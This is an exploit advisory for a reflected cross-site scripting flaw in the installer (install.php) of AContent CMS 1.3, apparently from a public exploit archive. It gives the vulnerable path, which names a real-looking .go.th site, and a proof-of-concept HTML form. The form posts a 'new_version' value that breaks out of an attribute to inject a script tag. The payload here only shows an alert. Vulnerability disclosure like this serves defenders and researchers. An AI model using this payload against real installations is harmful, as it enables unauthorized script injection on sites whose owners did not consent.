|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title:A  Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+] 
|[+] Version : 1.3|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on:A  Kali Linux 
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code: 
A 
<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
A A A  <input type="hidden" name="action" value="process" />
A A A  <input type="hidden" name="step" value="1" />
A A A  <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />
A A A  
A A A  <input type="submit" name="submit" class="button" value="I Agree" /> 
A A A A A A A  <input type="submit" name="submit" class="button" value="I Disagree" /><br />
A A A  
</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|